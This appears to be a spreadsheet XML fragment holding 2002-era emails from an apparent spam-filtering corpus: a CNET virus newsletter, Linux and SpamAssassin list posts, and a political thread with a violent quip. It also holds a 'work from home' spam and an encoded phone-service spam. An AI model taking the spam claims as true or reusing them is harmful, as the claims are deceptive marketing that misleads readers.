 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 17, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/66x86_robertv.gif" width=66 height=86&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--&lt;A HREF="mailto:robert.vamosi@cnet.com"&gt;Robert Vamosi&lt;/A&gt;&lt;br&gt;Senior Associate Editor&lt;br&gt;CNET Software and Internet Services&lt;/font&gt;&lt;/td&gt;
 					&lt;td width=10&gt;&amp;nbsp;&lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;So far, 2002 has been a year marked with variations on earlier
 worms. If you update your antivirus software on a regular basis,
 these new versions of Frethem and Yaha shouldn't be a nuisance.
 But if you haven't updated in a while, these variants--plus the
 continuing threat of Klez.h--should motivate you. In security
 news, a flaw in certain versions of PGP encryption could affect
 Outlook users. Read on to learn whether you're vulnerable.
  &lt;/font&gt;&lt;br&gt;
 						&amp;nbsp;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face="Arial, Helvetica"&gt;			
 &lt;img src="http://www.cnet.com/i/nl/sw/HEAD_alerts.psd-1.gif" alt="Alerts" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=93 align=left&gt;
 &lt;tr&gt;&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqN32HwbFUByjw2PB1s79R" &gt;&lt;img src="http://www.cnet.com/i/tt/col/021302broken.jpg" width="85" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U793ndUQ41PHq15ZNEEZuR" &gt;Frethem.k worm wants to give you a password&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; An e-mail message that promises to reveal secret information with
 a password is yet another variant from the pesky Frethem worm
 family. Frethem.k, technically known as w32.frethem.k@mm, also
 called Frethem.l by some vendors, uses its own SMTP engine to
 send e-mail using addresses obtained from infected systems. This
 worm does not carry a destructive payload. Mac and Linux users
 are not affected.
 &lt;P&gt;
 &lt;/font&gt;
 &lt;P&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF78zCVXwcl8jfOfRHHUsR" &gt;Yaha.e screensaver worm spreading&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; The Yaha.e mass-mailing worm masquerades as a friendly
 screensaver, proving that users worldwide are still opening
 attached files from total strangers. Yaha.e (w32.yaha.e@mm, also
 known as Lentin.e, Yaha.f, and Yaha.g) is a successful variant of
 a worm first seen around Valentine's Day this year. Thankfully,
 this worm does not affect Mac, Linux, or Unix users.
 &lt;P&gt;
 &lt;/font&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/RHC_news.psd-1.gif" alt="News" width="150" height="20" border="0"&gt;&lt;br&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFhjXSWREfbQq-Kh1XhaZR" &gt;Leaky PGP Outlook plug-in &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;PGP 7.03 and 7.04, widely used plug-ins for Microsoft's Outlook
 e-mail client, inadvertently weakens security and leaves the mail
 program open to attack. Fortunately, there is a patch available.
 &lt;/font&gt;
 &lt;P&gt;
 &lt;!--&lt;IMG height=20 alt="Software Mailbag" src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_mail.gif" width=150 border=0 NOSEND="1"&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0skaAw31DvuUJ5QddfWmTdR" &gt;Are Web-based e-mail accounts less virus-prone than Outlook?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;&gt;Is it true that if I use a Web-based e-mail service such as&lt;BR&gt; 
 &gt;Yahoo I'll be safe from Outlook-related viruses? --Charles M.&lt;BR&gt;
 &lt;P&gt;
 No. Many new viruses do not require a PC-based e-mail client such
 as Outlook in order to spread. These new viruses, including 
 Klez, have their own e-mail client (SMTP) and can find e-mail
 addresses within cached Web pages on an infected machine,
 bypassing the need to use Outlook's Address Book. Larger
 Web-based e-mail services, such as Hotmail and Yahoo Mail, screen
 mail hosted on their sites for viruses, but there's no beating
 having a good antivirus product on your desktop just in case.
 &lt;/font&gt;--&gt;
 &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="410" height="5" border="0"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=09-joDSIj88OJFwid8LYSS7ZMgtY8cR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWhRb77CPqEsB8LE27qdRR"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href="http://clickthru.online.com/Click?q=33-vUjnINjX0Emwshgz6yClxb-7XsFR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSmiU90gIVX4RVXFO5JSrR"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href="http://clickthru.online.com/Click?q=5e-ssGdIn065ayIdlshsnStcVTQzciR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtEqr99nqT8UEE0WNrUZlR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxbqHeSXm-rU358atSBb9R" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0ueCRzmRuuKLvd75wKZzuR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTcWeIO7jM2cmpxUCPusR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWulnwpn7NWtUoF24wxeZR"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&lt;!--Horizontal Brick
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 
 NOSEND="1"&gt;&lt;BR&gt; &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; &lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;&lt;TBODY&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
  &lt;UL&gt;
         &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live tech help: submit your question now&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love: more than 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors' Choice Award: Pioneer Home Theater System HTS-910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 End Horizontal Brick--&gt;
 &lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;!-- Begin search box --&gt;
 	&lt;center&gt;
 	&lt;table border="0" cellpadding="1" cellspacing="0" width="90%"&gt;&lt;tr&gt;&lt;td bgcolor="#CCCCCC"&gt;
 	&lt;table border=0 cellspacing=0 cellpadding=0 width="100%"&gt;&lt;form method="GET" action="http://home.cnet.com/search/redirector/1,10207,0-0,00.html"&gt;
 	&lt;tr align=center valign=middle bgcolor="#FFFFFF"&gt;
 	&lt;td height=40 align=right nowrap&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td class="f"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Search&lt;/b&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 	&lt;td align=left&gt;&lt;input type="Text" class="f" name="qt" size="18" maxlength="255"&gt;&lt;/td&gt;
 	&lt;td&gt;&amp;nbsp;&lt;select name="tg"&gt;&lt;option value="sw-8888" selected&gt;In Software&lt;option value="nw"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;option value="wb"&gt;The Web&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 	&lt;td&gt;&amp;nbsp;&lt;input name='search' type='submit' class='f' value=' Go! '&gt;&amp;nbsp;
 	&lt;input type="hidden" name="tt" value="st.sw.8888.sbsr"&gt;&lt;/td&gt;
 	&lt;/tr&gt;&lt;/form&gt;
 	&lt;/table&gt; 
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 	&lt;/center&gt;  
 	&lt;!-- End search box --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line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width=599 bgcolor="#CCCCCC"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;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width=600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href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTGwOlvzGZP85eXsJh-uR" &gt;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HREF="http://clickthru.online.com/Click?q=f2-OZ_TrXwDRlHtO_ABBg_z6Iyim9eMm9RR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvhaOumBiqzUbrvLkiDZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T12_OlBn9kgGa2oXqGdR"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href="http://clickthru.online.com/Click?q=31-V_YRIjMsV6Ypq0FyLxjkqVAXXbcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4Bqrj9Qa1cN0535V0YiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBUF5b1NxCjjvDSwizzlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGdVgExKns2asfI8Uk4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokoQVyCaf70SVbToBBuR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXosV-Figi7yr9FKgsR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e461&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=b1-YzzzJ-x0nIp9RPY66tnQmlHWbPRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Sun Solaris..
</t>
  </si>
  <si>
    <t xml:space="preserve">Can someone explain what type of operating system Solaris is... as ive never
 seen or used it i dont know wheather to get a server from Sun or from DELL i
 would prefer a linux based server and Sun seems to be the one for that but
 im not sure if Solaris is a distro of linux or a completely different
 operating system? can someone explain...
 Kiall Mac Innes
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Windsor in the soup
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357897,215/
 Date: 2002-09-29T00:39:57+01:00
 *Comment:* Prince Charles's attempts to meddle in politics show how detached he 
 is from real life, says *Nick Cohen*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Our friends the Palestinians, Our servants in government.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; 
 &gt; I'm not against American taxpayers remodeling a school honoring a killer
 &gt; if we do it with a daisy cutter.
 With or without occupants?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Re: revoke problem
</t>
  </si>
  <si>
    <t xml:space="preserve">on Thu, Jul 18, 2002 at 01:18:01PM -0700, Chad Norwood wrote:
 &gt; On 18/07/02 15:13 -0400, Steven Champeon wrote:
 &gt; ) 
 &gt; ) Chad, has there been any progress on this? Thanks.
 &gt; 
 &gt; 
 &gt;   We are constantly working and improving the overall system,
 &gt;   client code, server code, logic, etc.  Sometimes the long term
 &gt;   fix is not apparent right away with specific issues seen by 
 &gt;   razor-users.  
 &gt; 
 &gt;   If a mail is reported and revoked by the same identity,
 &gt;   it still might be considered spam.  
 Oh, OK. That doesn't make sense. :) Can someone manually remove/revoke
 the message in question, then, while you work constantly to improve and
 tweak the system? Thanks :)
 &lt;snip&gt;
 &gt; ) &gt; I immediately revoked it, using the mutt command "|" and "razor-revoke",
 &gt; ) &gt; but it appears to still be in razor. Hashes are as follows:
 &gt; ) &gt; 
 &gt; ) &gt; 1 part N/A e1: Zh19_7n6GRBFk6lyr8PYJcIWGJ8A
 &gt; ) &gt; 1 part 0 e3: q_vLZZ9m-ZAD3N3e7ieSzeeYekaYF83f6G11dfcTy9kA
 &gt; ) &gt; 1 part 0 e4: dcq2LaohnBmKsqUJW4xnOsdyk9EA, ep4: 7542-10
 -- 
 hesketh.com/inc. v: (919) 834-2552 f: (919) 834-2554 w: http://hesketh.com
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Digest Number 2453
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;JUST as the pyramids of Egypt were built in honour of great kings, it was
 &gt;fitting that sandy replicas were created on Weymouth beach in memory of the
 &gt;king of the castle. Fred Darrington, who became the world's most famous
 sand
 &gt;sculptor, died last week aged 91. His grandson, Mark Anderson, who has
 taken
 &gt;over his Dorset seafront pitch, is determined that his grandfather's name
 will
 &gt;not be forgotten, despite the impermanence of his creations.
 Can someone please tell me what a "pitch" constitutes? I have an idea 
 it is somewhat like the spots street musicians claim, but this sounds 
 more formal.
 ------------------
 Just an area of the beach by the prom where he's allowed to make his
 sculptures.
 Weymouth is where I spent my teenage years. My mum and one sister still live
 there.
 So I'm pretty familiar with the sculptures; pretty impressive, and very big.
 (I think he uses some sort of armature for some bits - it's not just sand)
 They usually get vandalised, though; after a lot of drinks, it obviously is
 a good idea to break into the enclosure and kick all the sculptures to bits.
 Then again, Weymouth is pretty run down, and attracts holiday makers of the
 worst sort.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Having a problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Now that I have spam assassin and mailscanner working, how can I have smap
 deleted rather than forwarded?
 I changed spam.actions.conf to "default	delete" but it is still sending it
 to the recipient.
 Thanks,
 Ken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</si>
  <si>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Ken Dow reports that the current version of OmniOutliner can read
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:47:05AM
 Date: Wed, 25 Sep 2002 15:47:05 GMT
 Ken Dow reports[1] that the current version of OmniOutliner can read and write 
 OPML. This means, for example, with a little Radio script (or an AppleScript) 
 you could use Omni as an Instant Outliner[2].
 [1] http://radio.weblogs.com/0001015/images/2002/09/25/omniOutlinerWithOpml.jpg
 [2] http://davenet.userland.com/2002/04/02/jonUdellOnInstantOutlining
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HELP WANTED. WORK FROM HOME. FREE DETAILS
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/homebiz
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.basetel.com/homebiz
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.basetel.com/homebiz
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Completely OT, Siamese Cats???
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 20 Jul 2002, kevin lyda wrote:
 &gt; what is this obsession of yours with cats that hunt? 
 not my obsession - evolutions.
 anyway.. i dont like mice and rats, esp. not in the house. and we've
 not had one in the house since we got our present cat.
 &gt; you realise that while cats will sometimes bring birds to your bed,
 &gt; it's the wrong kind of bird...  :)
 :)
 its mostly mice though. and they will eventually (after a few summers)
 stop bringing their kills back to the house, once they realise that
 you're not interested and are never going to learn to hunt.
 (they're trying to teach you hunting basically. they do the same with
 kittens - first bring back kills, and then later they bring back live
 but injured prey for the kittens to practice on).
 although they'll still bring back stuff on occassion.
 &gt; kevin
 --paulj
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] spamc -c problems on 2.41?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Hlh2aiwFLCZwGcpw
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Thu, Sep 12, 2002 at 01:47:27PM -0700, Jeremy Kusnetz wrote:
 &gt; When running:
 &gt; spamc -c &lt; sample-spam.txt
 &gt; I get: 18.9/6.0   Which looks correct, BUT
 &gt; doing an echo $?, returns a 0 instead of 1.
 Can you submit this to bugzilla?  It definately is a bug, I mean I do
 a packet trace and here's what I get with one of my spams:
 [the request]
 0040  0b 8e 43 48 45 43 4b 20 53 50 41 4d 43 2f 31 2e   ..CHECK SPAMC/1.
 0050  32 0d 0a 55 73 65 72 3a 20 66 65 6c 69 63 69 74   2..User: felicit
 0060  79 0d 0a 43 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74   y..Content-lengt
 0070  68 3a 20 38 33 34 39 0d 0a 0d 0a                  h: 8349....
 [the spam, removed for brevity]
 [the response]
 0040  0b 8f 53 50 41 4d 44 2f 31 2e 31 20 30 20 45 58   ..SPAMD/1.1 0 EX
 0050  5f 4f 4b 0d 0a 53 70 61 6d 3a 20 46 61 6c 73 65   _OK..Spam: False
 0060  20 3b 20 34 36 2e 35 20 2f 20 35 2e 30 0d 0a 0d    ; 46.5 / 5.0...
 So spamd is definately returning false incorrectly.
 --=20
 Randomly Generated Tagline:
 ?pu gnikcab yb naem uoy tahw siht sI
 --Hlh2aiwFLCZwGcpw
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9gjgnAuOQUeWAs2MRAgoCAKDJGoZwXy7vwZuQIRaFfYJ+haWtbQCg9T0V
 IW7ty+Y1BTybFpquY1ifZPc=
 =eL/8
 -----END PGP SIGNATURE-----
 --Hlh2aiwFLCZwGcpw--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</si>
  <si>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Phone service                                                                 2968ZuyW7-202zTVW0499-20
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D0_65B52D1A.C4816C13
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 DQo8Ym9keSBiZ2NvbG9yPSIjRkZGRkZGIiB0ZXh0PSIjQ0MzMzMzIj4NCjxw
 Pjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxi
 Pjxmb250IHNpemU9IjMiPkhpOiA8YnI+DQogIDwvZm9udD48L2I+PC9mb250
 PjwvcD4NCjxwPjxiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNh
 bnMtc2VyaWYiIHNpemU9IjMiIGNvbG9yPSIjMDAwMDAwIj5IYXZlIA0KICB5
 b3UgYmVlbiBwYXlpbmcgdG9vIG11Y2ggZm9yIHlvdXIgaG9tZSBvcjxicj4N
 CiAgYnVzaW5lc3MgbG9uZyBkaXN0YW5jZT88L2ZvbnQ+PC9iPjwvcD4NCjxw
 Pjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNv
 bG9yPSIjMDAwMDAwIj48Yj48Zm9udCBzaXplPSIzIj5IYXZlIA0KICB5b3Ug
 YmVlbiBsb29raW5nIGZvciBhbiBhZmZvcmRhYmxlIGJ1dCBob25lc3Q8YnI+
 DQogIGxvbmcgZGlzdGFuY2UgYWx0ZXJuYXRpdmU/PC9mb250PjwvYj48L2Zv
 bnQ+PC9wPg0KPHA+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiI+PGI+PGZvbnQgc2l6ZT0iMyI+V2UgYXJlIG9mZmVyaW5nIA0K
 ICBGaWJlciBvcHRpYyBMb25nIGRpc3RhbmNlIGZvcjxicj4NCiAgYXMgbG93
 IGFzICQ5Ljk1IHBlciBtb250aCE8L2ZvbnQ+PC9iPjwvZm9udD48L3A+DQo8
 cD48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj48
 Yj48Zm9udCBzaXplPSIzIj48YSBocmVmPSJtYWlsdG86cGhvbmVvZmZlcjAw
 MUBuZXRzY2FwZS5jb20/c3ViamVjdD1QaG9uZW9mZmVyIj5FbWFpbDwvYT4g
 DQogIHVzIHdpdGggeW91ciBwaG9uZSBudW1iZXIgYW5kIHdlJ2xsIGNhbGwg
 eW91PGJyPg0KICBiYWNrIHNvIHlvdSBjYW4gaGVhciBob3cgZ3JlYXQgdGhl
 IGNvbm5lY3Rpb24gaXMuPGJyPg0KICA8YnI+DQogIFNpeCBwbGFucyB0byBj
 aG9vc2UgZnJvbSBpbmNsdWRpbmcgYSB0cmF2ZWwgcGxhbi4gPGJyPg0KICA8
 YnI+DQogIDxmb250IGNvbG9yPSIjMDAwMDAwIj5UaGVyZSBhcmUgbm8gY3Jl
 ZGl0IGNoZWNrcyBhbmQgYmVjYXVzZSB5b3UgZG9uJ3QgPGJyPg0KICBuZWVk
 IHRvIGNoYW5nZSB5b3VyIGxvbmcgZGlzdGFuY2UgY2FycmllciwgeW91ciA8
 YnI+DQogIHNlcnZpY2UgY2FuIGJlIHR1cm5lZCBvbiBpbiBqdXN0IGEgZmV3
 IGhvdXJzLiA8YnI+DQogIDwvZm9udD48YnI+DQogIERpc3RyaWJ1dG9ycyBu
 ZWVkZWQhIDxicj4NCiAgPGJyPg0KICA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+
 V2UgaGF2ZSBkaXN0cmlidXRvcnMgbm93IG1ha2luZyBhIGZldyBodW5kcmVk
 IHRvIDxicj4NCiAgbWFueSB0aG91c2FuZHMgb2YgZG9sbGFycyBwZXIgbW9u
 dGggZnJvbSB0aGUgY29tZm9ydCA8YnI+DQogIG9mIHRoZWlyIGhvbWVzLiA8
 L2ZvbnQ+PGJyPg0KICA8YnI+DQogIE9idGFpbiA8YSBocmVmPSJtYWlsdG86
 cGhvbmVvZmZlcjAwMUBuZXRzY2FwZS5uZXQ/c3ViamVjdD1QaG9uZW9mZmVy
 Ij5jb21wbGV0ZSANCiAgZGV0YWlsczwvYT4gSW5jbHVkZSB5b3VyIHBob25l
 IG51bWJlci0gd2UnbGw8YnI+DQogIGNhbGwgeW91IGJhY2sgdG8gY29uZmly
